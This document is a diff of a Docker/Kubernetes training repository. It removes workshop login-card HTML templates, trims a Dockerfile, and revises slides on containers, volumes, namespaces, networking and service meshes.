|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
|
||||
@@ -1,121 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://FIXME.container.training" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine virtuelle" -%}
|
||||
{%- set this_or_each = "cette" -%}
|
||||
{%- set plural = "" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "chaque" -%}
|
||||
{%- set plural = "s" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.3em;
|
||||
}
|
||||
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Voici les informations permettant de se connecter à votre
|
||||
{{ cluster_or_machine }} pour cette formation.
|
||||
Vous pouvez vous connecter à {{ this_or_each }} machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
</p>
|
||||
<p>
|
||||
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
|
||||
<table>
|
||||
<tr><td>identifiant:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>mot de passe:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Adresse{{ plural }} IP :
|
||||
<!--<img class="kube" src="{{ image_src }}" />-->
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>Le support de formation est à l'adresse suivante :
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,134 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://qconuk2019.container.training/" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1.0em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
height: 31%;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
div.back {
|
||||
border: 1px dotted white;
|
||||
}
|
||||
|
||||
div.back p {
|
||||
margin: 0.5em 1em 0 1em;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.8em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 5em;
|
||||
float: right;
|
||||
margin-right: 1em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="back">
|
||||
<br/>
|
||||
<p>You got this at the workshop
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during QCON London (March 2019).</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team or organization
|
||||
on Docker, container, and Kubernetes,
|
||||
with curriculums of 1 to 5 days.
|
||||
</p>
|
||||
<p>Interested? Contact me at:</p>
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
<p>Thank you!</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,106 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,7 +1,4 @@
|
||||
FROM alpine
|
||||
RUN apk update
|
||||
RUN apk add entr
|
||||
RUN apk add py-pip
|
||||
RUN apk add git
|
||||
FROM alpine:3.9
|
||||
RUN apk add --no-cache entr py-pip git
|
||||
COPY requirements.txt .
|
||||
RUN pip install -r requirements.txt
|
||||
|
||||
@@ -150,7 +150,7 @@ Different deployments will use different underlying technologies.
|
||||
* Ad-hoc deployments can use a master-less discovery protocol
|
||||
like avahi to register and discover services.
|
||||
* It is also possible to do one-shot reconfiguration of the
|
||||
ambassadors. It is slightly less dynamic but has much less
|
||||
ambassadors. It is slightly less dynamic but has far fewer
|
||||
requirements.
|
||||
* Ambassadors can be used in addition to, or instead of, overlay networks.
|
||||
|
||||
@@ -186,22 +186,48 @@ Different deployments will use different underlying technologies.
|
||||
|
||||
---
|
||||
|
||||
## Section summary
|
||||
## Some popular service meshes
|
||||
|
||||
We've learned how to:
|
||||
... And related projects:
|
||||
|
||||
* Understand the ambassador pattern and what it is used for (service portability).
|
||||
|
||||
For more information about the ambassador pattern, including demos on Swarm and ECS:
|
||||
|
||||
* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
|
||||
|
||||
* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
|
||||
|
||||
Some services meshes and related projects:
|
||||
|
||||
* [Istio](https://istio.io/)
|
||||
|
||||
* [Linkerd](https://linkerd.io/)
|
||||
* [Consul Connect](https://www.consul.io/docs/connect/index.html)
|
||||
<br/>
|
||||
Transparently secures service-to-service connections with mTLS.
|
||||
|
||||
* [Gloo](https://gloo.solo.io/)
|
||||
<br/>
|
||||
API gateway that can interconnect applications on VMs, containers, and serverless.
|
||||
|
||||
* [Istio](https://istio.io/)
|
||||
<br/>
|
||||
A popular service mesh.
|
||||
|
||||
* [Linkerd](https://linkerd.io/)
|
||||
<br/>
|
||||
Another popular service mesh.
|
||||
|
||||
---
|
||||
|
||||
## Learning more about service meshes
|
||||
|
||||
A few blog posts about service meshes:
|
||||
|
||||
* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
|
||||
<br/>
|
||||
Provides historical context: how did we do before service meshes were invented?
|
||||
|
||||
* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
|
||||
<br/>
|
||||
Explains the purpose of service meshes. Illustrates some NGINX features.
|
||||
|
||||
* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
|
||||
<br/>
|
||||
Includes high-level overview and definitions.
|
||||
|
||||
* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
|
||||
<br/>
|
||||
Includes a step-by-step demo of Linkerd.
|
||||
|
||||
And a video:
|
||||
|
||||
* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
|
||||
|
||||
@@ -98,13 +98,13 @@ COPY prometheus.conf /etc
|
||||
|
||||
* Allows arbitrary customization and complex configuration files.
|
||||
|
||||
* Requires to write a configuration file. (Obviously!)
|
||||
* Requires writing a configuration file. (Obviously!)
|
||||
|
||||
* Requires to build an image to start the service.
|
||||
* Requires building an image to start the service.
|
||||
|
||||
* Requires to rebuild the image to reconfigure the service.
|
||||
* Requires rebuilding the image to reconfigure the service.
|
||||
|
||||
* Requires to rebuild the image to upgrade the service.
|
||||
* Requires rebuilding the image to upgrade the service.
|
||||
|
||||
* Configured images can be stored in registries.
|
||||
|
||||
@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp
|
||||
|
||||
* Allows arbitrary customization and complex configuration files.
|
||||
|
||||
* Requires to create a volume for each different configuration.
|
||||
* Requires creating a volume for each different configuration.
|
||||
|
||||
* Services with identical configurations can use the same volume.
|
||||
|
||||
* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
|
||||
* Doesn't require building / rebuilding an image when upgrading / reconfiguring.
|
||||
|
||||
* Configuration can be generated or edited through another container.
|
||||
|
||||
@@ -198,4 +198,4 @@ E.g.:
|
||||
|
||||
- read the secret on stdin when the service starts,
|
||||
|
||||
- pass the secret using an API endpoint.
|
||||
- pass the secret using an API endpoint.
|
||||
|
||||
@@ -257,7 +257,7 @@ $ docker kill 068 57ad
|
||||
The `stop` and `kill` commands can take multiple container IDs.
|
||||
|
||||
Those containers will be terminated immediately (without
|
||||
the 10 seconds delay).
|
||||
the 10-second delay).
|
||||
|
||||
Let's check that our containers don't show up anymore:
|
||||
|
||||
|
||||
@@ -222,16 +222,16 @@ CMD ["hello world"]
|
||||
Let's build it:
|
||||
|
||||
```bash
|
||||
$ docker build -t figlet .
|
||||
$ docker build -t myfiglet .
|
||||
...
|
||||
Successfully built 6e0b6a048a07
|
||||
Successfully tagged figlet:latest
|
||||
Successfully tagged myfiglet:latest
|
||||
```
|
||||
|
||||
Run it without parameters:
|
||||
|
||||
```bash
|
||||
$ docker run figlet
|
||||
$ docker run myfiglet
|
||||
_ _ _ _
|
||||
| | | | | | | | |
|
||||
| | _ | | | | __ __ ,_ | | __|
|
||||
@@ -246,7 +246,7 @@ $ docker run figlet
|
||||
Now let's pass extra arguments to the image.
|
||||
|
||||
```bash
|
||||
$ docker run figlet hola mundo
|
||||
$ docker run myfiglet hola mundo
|
||||
_ _
|
||||
| | | | |
|
||||
| | __ | | __, _ _ _ _ _ __| __
|
||||
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.
|
||||
|
||||
What if we want to run a shell in our container?
|
||||
|
||||
We cannot just do `docker run figlet bash` because
|
||||
We cannot just do `docker run myfiglet bash` because
|
||||
that would just tell figlet to display the word "bash."
|
||||
|
||||
We use the `--entrypoint` parameter:
|
||||
|
||||
```bash
|
||||
$ docker run -it --entrypoint bash figlet
|
||||
$ docker run -it --entrypoint bash myfiglet
|
||||
root@6027e44e2955:/#
|
||||
```
|
||||
|
||||
|
||||
@@ -86,7 +86,7 @@ like Windows, macOS, Solaris, FreeBSD ...
|
||||
|
||||
* No notion of image (container filesystems have to be managed manually).
|
||||
|
||||
* Networking has to be setup manually.
|
||||
* Networking has to be set up manually.
|
||||
|
||||
---
|
||||
|
||||
@@ -112,7 +112,7 @@ like Windows, macOS, Solaris, FreeBSD ...
|
||||
|
||||
* Strong emphasis on security (through privilege separation).
|
||||
|
||||
* Networking has to be setup separately (e.g. through CNI plugins).
|
||||
* Networking has to be set up separately (e.g. through CNI plugins).
|
||||
|
||||
* Partial image management (pull, but no push).
|
||||
|
||||
@@ -152,7 +152,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
|
||||
|
||||
* Basic image support (tar archives and raw disk images).
|
||||
|
||||
* Network has to be setup manually.
|
||||
* Network has to be set up manually.
|
||||
|
||||
---
|
||||
|
||||
@@ -164,7 +164,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
|
||||
|
||||
* Run each container in a lightweight virtual machine.
|
||||
|
||||
* Requires to run on bare metal *or* with nested virtualization.
|
||||
* Requires running on bare metal *or* with nested virtualization.
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -474,7 +474,7 @@ When creating a network, extra options can be provided.
|
||||
|
||||
* `--ip-range` (in CIDR notation) indicates the subnet to allocate from.
|
||||
|
||||
* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
|
||||
* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).
|
||||
|
||||
---
|
||||
|
||||
@@ -528,7 +528,9 @@ Very short instructions:
|
||||
- `docker network create mynet --driver overlay`
|
||||
- `docker service create --network mynet myimage`
|
||||
|
||||
See https://jpetazzo.github.io/container.training for all the deets about clustering!
|
||||
If you want to learn more about Swarm mode, you can check
|
||||
[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
|
||||
or [these slides](https://container.training/swarm-selfpaced.yml.html).
|
||||
|
||||
---
|
||||
|
||||
@@ -554,7 +556,7 @@ General idea:
|
||||
|
||||
* So far, we have specified which network to use when starting the container.
|
||||
|
||||
* The Docker Engine also allows to connect and disconnect while the container runs.
|
||||
* The Docker Engine also allows connecting and disconnecting while the container is running.
|
||||
|
||||
* This feature is exposed through the Docker API, and through two Docker CLI commands:
|
||||
|
||||
|
||||
5
slides/containers/Exercise_Composefile.md
Normal file
5
slides/containers/Exercise_Composefile.md
Normal file
@@ -0,0 +1,5 @@
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
9
slides/containers/Exercise_Dockerfile_Advanced.md
Normal file
9
slides/containers/Exercise_Dockerfile_Advanced.md
Normal file
@@ -0,0 +1,9 @@
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
5
slides/containers/Exercise_Dockerfile_Basic.md
Normal file
5
slides/containers/Exercise_Dockerfile_Basic.md
Normal file
@@ -0,0 +1,5 @@
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
@@ -203,4 +203,90 @@ bash: figlet: command not found
|
||||
|
||||
* The basic Ubuntu image was used, and `figlet` is not here.
|
||||
|
||||
* We will see in the next chapters how to bake a custom image with `figlet`.
|
||||
---
|
||||
|
||||
## Where's my container?
|
||||
|
||||
* Can we reuse that container that we took time to customize?
|
||||
|
||||
*We can, but that's not the default workflow with Docker.*
|
||||
|
||||
* What's the default workflow, then?
|
||||
|
||||
*Always start with a fresh container.*
|
||||
<br/>
|
||||
*If we need something installed in our container, build a custom image.*
|
||||
|
||||
* That seems complicated!
|
||||
|
||||
*We'll see that it's actually pretty easy!*
|
||||
|
||||
* And what's the point?
|
||||
|
||||
*This puts a strong emphasis on automation and repeatability. Let's see why ...*
|
||||
|
||||
---
|
||||
|
||||
## Pets vs. Cattle
|
||||
|
||||
* In the "pets vs. cattle" metaphor, there are two kinds of servers.
|
||||
|
||||
* Pets:
|
||||
|
||||
* have distinctive names and unique configurations
|
||||
|
||||
* when they have an outage, we do everything we can to fix them
|
||||
|
||||
* Cattle:
|
||||
|
||||
* have generic names (e.g. with numbers) and generic configuration
|
||||
|
||||
* configuration is enforced by configuration management, golden images ...
|
||||
|
||||
* when they have an outage, we can replace them immediately with a new server
|
||||
|
||||
* What's the connection with Docker and containers?
|
||||
|
||||
---
|
||||
|
||||
## Local development environments
|
||||
|
||||
* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
|
||||
|
||||
* create VM from base template (Ubuntu, CentOS...)
|
||||
|
||||
* install packages, set up environment
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shut down VM
|
||||
|
||||
* next time we need to work on project, restart VM as we left it
|
||||
|
||||
* if we need to tweak the environment, we do it live
|
||||
|
||||
* Over time, the VM configuration evolves, diverges.
|
||||
|
||||
* We don't have a clean, reliable, deterministic way to provision that environment.
|
||||
|
||||
---
|
||||
|
||||
## Local development with Docker
|
||||
|
||||
* With Docker, the workflow looks like this:
|
||||
|
||||
* create container image with our dev environment
|
||||
|
||||
* run container with that image
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shut down container
|
||||
|
||||
* next time we need to work on project, start a new container
|
||||
|
||||
* if we need to tweak the environment, we create a new image
|
||||
|
||||
* We have a clear definition of our environment, and can share it reliably with others.
|
||||
|
||||
* Let's see in the next chapters how to bake a custom image with `figlet`!
|
||||
|
||||
@@ -70,8 +70,9 @@ class: pic
|
||||
|
||||
* An image is a read-only filesystem.
|
||||
|
||||
* A container is an encapsulated set of processes running in a
|
||||
read-write copy of that filesystem.
|
||||
* A container is an encapsulated set of processes,
|
||||
|
||||
running in a read-write copy of that filesystem.
|
||||
|
||||
* To optimize container boot time, *copy-on-write* is used
|
||||
instead of regular copy.
|
||||
@@ -177,8 +178,11 @@ Let's explain each of them.
|
||||
|
||||
## Root namespace
|
||||
|
||||
The root namespace is for official images. They are put there by Docker Inc.,
|
||||
but they are generally authored and maintained by third parties.
|
||||
The root namespace is for official images.
|
||||
|
||||
They are gated by Docker Inc.
|
||||
|
||||
They are generally authored and maintained by third parties.
|
||||
|
||||
Those images include:
|
||||
|
||||
@@ -188,7 +192,7 @@ Those images include:
|
||||
|
||||
* Ready-to-use components and services, like redis, postgresql...
|
||||
|
||||
* Over 130 at this point!
|
||||
* Over 150 at this point!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -156,7 +156,7 @@ Option 3:
|
||||
|
||||
* Use a *volume* to mount local files into the container
|
||||
* Make changes locally
|
||||
* Changes are reflected into the container
|
||||
* Changes are reflected in the container
|
||||
|
||||
---
|
||||
|
||||
@@ -176,7 +176,7 @@ $ docker run -d -v $(pwd):/src -P namer
|
||||
|
||||
* `namer` is the name of the image we will run.
|
||||
|
||||
* We don't specify a command to run because it is already set in the Dockerfile.
|
||||
* We don't specify a command to run because it is already set in the Dockerfile via `CMD`.
|
||||
|
||||
Note: on Windows, replace `$(pwd)` with `%cd%` (or `${pwd}` if you use PowerShell).
|
||||
|
||||
@@ -192,7 +192,7 @@ The flag structure is:
|
||||
[host-path]:[container-path]:[rw|ro]
|
||||
```
|
||||
|
||||
* If `[host-path]` or `[container-path]` doesn't exist it is created.
|
||||
* `[host-path]` and `[container-path]` are created if they don't exist.
|
||||
|
||||
* You can control the write status of the volume with the `ro` and
|
||||
`rw` options.
|
||||
@@ -255,13 +255,13 @@ color: red;
|
||||
|
||||
* Volumes are *not* copying or synchronizing files between the host and the container.
|
||||
|
||||
* Volumes are *bind mounts*: a kernel mechanism associating a path to another.
|
||||
* Volumes are *bind mounts*: a kernel mechanism associating one path with another.
|
||||
|
||||
* Bind mounts are *kind of* similar to symbolic links, but at a very different level.
|
||||
|
||||
* Changes made on the host or on the container will be visible on the other side.
|
||||
|
||||
(Since under the hood, it's the same file on both anyway.)
|
||||
(Under the hood, it's the same file anyway.)
|
||||
|
||||
---
|
||||
|
||||
@@ -273,7 +273,7 @@ by Chad Fowler, where he explains the concept of immutable infrastructure.)*
|
||||
|
||||
--
|
||||
|
||||
* Let's mess up majorly with our container.
|
||||
* Let's majorly mess up our container.
|
||||
|
||||
(Remove files or whatever.)
|
||||
|
||||
@@ -319,7 +319,7 @@ and *canary deployments*.
|
||||
<br/>
|
||||
Use the `-v` flag to mount our source code inside the container.
|
||||
|
||||
3. Edit the source code outside the containers, using regular tools.
|
||||
3. Edit the source code outside the container, using familiar tools.
|
||||
<br/>
|
||||
(vim, emacs, textmate...)
|
||||
|
||||
|
||||
@@ -86,13 +86,13 @@ class: extra-details, deep-dive
|
||||
|
||||
- the `unshare()` system call.
|
||||
|
||||
- The Linux tool `unshare` allows to do that from a shell.
|
||||
- The Linux tool `unshare` allows doing that from a shell.
|
||||
|
||||
- A new process can re-use none / all / some of the namespaces of its parent.
|
||||
|
||||
- It is possible to "enter" a namespace with the `setns()` system call.
|
||||
|
||||
- The Linux tool `nsenter` allows to do that from a shell.
|
||||
- The Linux tool `nsenter` allows doing that from a shell.
|
||||
|
||||
---
|
||||
|
||||
@@ -138,11 +138,11 @@ class: extra-details, deep-dive
|
||||
|
||||
- gethostname / sethostname
|
||||
|
||||
- Allows to set a custom hostname for a container.
|
||||
- Allows setting a custom hostname for a container.
|
||||
|
||||
- That's (mostly) it!
|
||||
|
||||
- Also allows to set the NIS domain.
|
||||
- Also allows setting the NIS domain.
|
||||
|
||||
(If you don't know what a NIS domain is, you don't have to worry about it!)
|
||||
|
||||
@@ -392,13 +392,13 @@ class: extra-details
|
||||
|
||||
- Processes can have their own root fs (à la chroot).
|
||||
|
||||
- Processes can also have "private" mounts. This allows to:
|
||||
- Processes can also have "private" mounts. This allows:
|
||||
|
||||
- isolate `/tmp` (per user, per service...)
|
||||
- isolating `/tmp` (per user, per service...)
|
||||
|
||||
- mask `/proc`, `/sys` (for processes that don't need them)
|
||||
- masking `/proc`, `/sys` (for processes that don't need them)
|
||||
|
||||
- mount remote filesystems or sensitive data,
|
||||
- mounting remote filesystems or sensitive data,
|
||||
<br/>but make it visible only for allowed processes
|
||||
|
||||
- Mounts can be totally private, or shared.
|
||||
@@ -570,7 +570,7 @@ Check `man 2 unshare` and `man pid_namespaces` if you want more details.
|
||||
|
||||
## User namespace
|
||||
|
||||
- Allows to map UID/GID; e.g.:
|
||||
- Allows mapping UID/GID; e.g.:
|
||||
|
||||
- UID 0→1999 in container C1 is mapped to UID 10000→11999 on host
|
||||
- UID 0→1999 in container C2 is mapped to UID 12000→13999 on host
|
||||
@@ -947,7 +947,7 @@ Killed
|
||||
|
||||
(i.e., "this group of process used X seconds of CPU0 and Y seconds of CPU1".)
|
||||
|
||||
- Allows to set relative weights used by the scheduler.
|
||||
- Allows setting relative weights used by the scheduler.
|
||||
|
||||
---
|
||||
|
||||
@@ -1101,9 +1101,9 @@ See `man capabilities` for the full list and details.
|
||||
|
||||
- Original seccomp only allows `read()`, `write()`, `exit()`, `sigreturn()`.
|
||||
|
||||
- The seccomp-bpf extension allows to specify custom filters with BPF rules.
|
||||
- The seccomp-bpf extension allows specifying custom filters with BPF rules.
|
||||
|
||||
- This allows to filter by syscall, and by parameter.
|
||||
- This allows filtering by syscall, and by parameter.
|
||||
|
||||
- BPF code can perform arbitrarily complex checks, quickly, and safely.
|
||||
|
||||
|
||||
@@ -6,8 +6,6 @@ In this chapter, we will:
|
||||
|
||||
* Present (from a high-level perspective) some orchestrators.
|
||||
|
||||
* Show one orchestrator (Kubernetes) in action.
